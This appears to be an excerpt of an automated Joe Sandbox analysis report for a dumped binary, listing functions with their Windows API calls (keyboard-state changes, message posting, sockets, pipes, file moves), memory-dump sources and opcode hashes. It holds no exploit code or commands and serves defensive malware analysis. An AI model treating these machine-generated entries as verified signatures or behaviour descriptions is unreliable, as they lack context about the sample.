                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0101B9C4
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0101B9E7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d2ad87b9c3aab70c297338efc0cbe5fb1ac7739d3f50e8fa0e6236f1e325f182
                                                                                                                                                                                                                                                                                                        • Instruction ID: edfff4cfa99e499227c9da0b7b5be549b7e6e669b3d3de6449cb0a16655dabb9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2ad87b9c3aab70c297338efc0cbe5fb1ac7739d3f50e8fa0e6236f1e325f182
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2451D2A16087D53EFB36423C8855BBABEFA6B06704F0884C9E2D5468D6C3DCE9C5D750
                                                                                                                                                                                                                                                                                                        Function 0101B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(00000000), ref: 0101B6E0
                                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 0101B6F5
                                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0101B756
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0101B782
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0101B79F
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0101B7DE
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0101B7FF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6ae24aed33bc39d6bd866f9a23292ac8da01cd0856219bfcfdf9d0fc75ee41e6
                                                                                                                                                                                                                                                                                                        • Instruction ID: f56760a6faa74e0d920c20e5505a6f4dabee5f4a070ddb15b4e981c3639ca10e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ae24aed33bc39d6bd866f9a23292ac8da01cd0856219bfcfdf9d0fc75ee41e6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A51C3A0A047D63EFB3382688C55BBABEF96B05704F0C84C9E1D5468DAD79CE894D750
                                                                                                                                                                                                                                                                                                        Function 00FE57A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00FE5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00FE57E3
                                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00FE585E
                                                                                                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 00FE5879
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00FE589F
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00FE5F16,00000000,?,?,?,?,?,?,?,?,?,00FE5F16,?), ref: 00FE58BE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,00FE5F16,00000000,?,?,?,?,?,?,?,?,?,00FE5F16,?), ref: 00FE58F7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe358546dbb7401f4f682dcae9c4fcf5d122cf36fa601fe84a00b17a48a227f4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2238737b8e5116d13df54e47f25381d427bf1dcefbb4dbc807dd67439a2fe2f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe358546dbb7401f4f682dcae9c4fcf5d122cf36fa601fe84a00b17a48a227f4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5351D671D00689DFCB10CFA9D885BEEBBF8EF18720F14411AE991E7292D7349A41DB60
                                                                                                                                                                                                                                                                                                        Function 00FD3090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD30BB
                                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD30C3
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD3151
                                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD317C
                                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00FD31D1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9cfa2cd477cfb9e7667f46ddc6eab08a71c5b494d4593f52dedc26e62bf9a4c5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 474f5babf6fb1c1ba9ed20858b987954a6fbfbacca4a6b99a1160d6cbe1f9721
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cfa2cd477cfb9e7667f46ddc6eab08a71c5b494d4593f52dedc26e62bf9a4c5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7041D434E002199BCF10DF68CC85BAEBBB6BF44324F188156EA146B352D736DB05DB92
                                                                                                                                                                                                                                                                                                        Function 01031B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 01033AD7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033AAB: _wcslen.LIBCMT ref: 01033AF8
                                                                                                                                                                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01031B6F
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01031B7E
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 01031C26
                                                                                                                                                                                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 01031C56
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d95dce3cb3ece903c0683e729dc3154ebb0f81ee13f42a1d93fa3deec0d643b
                                                                                                                                                                                                                                                                                                        • Instruction ID: bdb00147d274a7046b3ac17204c9345acd0591b0c9d5bb7ff5888f5b4f5bd7bf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d95dce3cb3ece903c0683e729dc3154ebb0f81ee13f42a1d93fa3deec0d643b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE41D675600104AFEB109F68C984BE9BBEDFF85324F048099E9899B282D775ED41CBE1
                                                                                                                                                                                                                                                                                                        Function 0101D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101D7CD,?), ref: 0101E714
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101D7CD,?), ref: 0101E72D
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0101D7F0
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101D82A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101D8B0
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101D8C6
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 0101D90C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                        • Opcode ID: 29d32dddee4c89e3737c4383a6b1258961d7242a1b3e6ef594000fd50b2aa8b4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6f8add700eb6dcba13905cf4617c8a5aac55da3a8c3995a8665c949a6c080d46
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29d32dddee4c89e3737c4383a6b1258961d7242a1b3e6ef594000fd50b2aa8b4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 234163719452199FDF53EBA4D985ADE77F8AF18340F0000EA9689EB145EB3DB788CB10
                                                                                                                                                                                                                                                                                                        Function 01043899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 010438B8
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 010438EB
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01043920
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 01043952
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0104397C
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0104398D
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010439A7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fffad8a355eec8dc4dad8a5d9a245a9df5c028c222ee7db8035188e4cc92c703
                                                                                                                                                                                                                                                                                                        • Instruction ID: 98bc2dd15f2f6f0808db61d25d51374478584e73d45a2624e5b1f1249ae54d5c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fffad8a355eec8dc4dad8a5d9a245a9df5c028c222ee7db8035188e4cc92c703
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A63118B8604265AFEB72CF48D9C4F6937E1FB8A750F1521A4F5D08F2A6C776A844CB01
                                                                                                                                                                                                                                                                                                        Function 0101808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010180D0
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010180F6
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 010180F9
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018117
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 01018120
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 01018145
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018153
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 161fbb02ac10935ee83976c782326b246b9fc9cbc77fde179a0196a76967200e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 86339e4f5d0cb48548588861c7a5f5c049de9ace64d48772c1de68f312cdf61b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 161fbb02ac10935ee83976c782326b246b9fc9cbc77fde179a0196a76967200e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3921B576600219AF9F50DEA8CC84DBA77ECEB49360B048426FA45DB295DA78DD418B60
                                                                                                                                                                                                                                                                                                        Function 01018164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010181A9
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010181CF
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 010181D2
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 010181F3
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 010181FC
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 01018216
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 01018224
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2eefeeddeacb0ba49093275da5365e58055d15ae176acb8340487aba4e9f0766
                                                                                                                                                                                                                                                                                                        • Instruction ID: 76cfdcfa75aa8c37354d783486288cf8359ca7196a4a241316760260a377f7a4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eefeeddeacb0ba49093275da5365e58055d15ae176acb8340487aba4e9f0766
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5721A176600204BF9B51ABECDCC8DAA77ECEB49360704C126F945CB295DA78ED41CB64
                                                                                                                                                                                                                                                                                                        Function 01020F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 01020F6D
                                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020FA8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5c2acf03c1bc3e48d74adf2852804498c857e9a459f61705338f4deeea355bd1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 73176e04d48c3f0cc1dbbfee6115c98a5db77f8e597a406902f4caea6421ea85
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c2acf03c1bc3e48d74adf2852804498c857e9a459f61705338f4deeea355bd1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4721B27560032AABEB709F688D84A9A7BE8BF55730F200A59F9E1E32D4D7B5D440CB50
                                                                                                                                                                                                                                                                                                        Function 01020E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 01020E99
                                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020ED5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
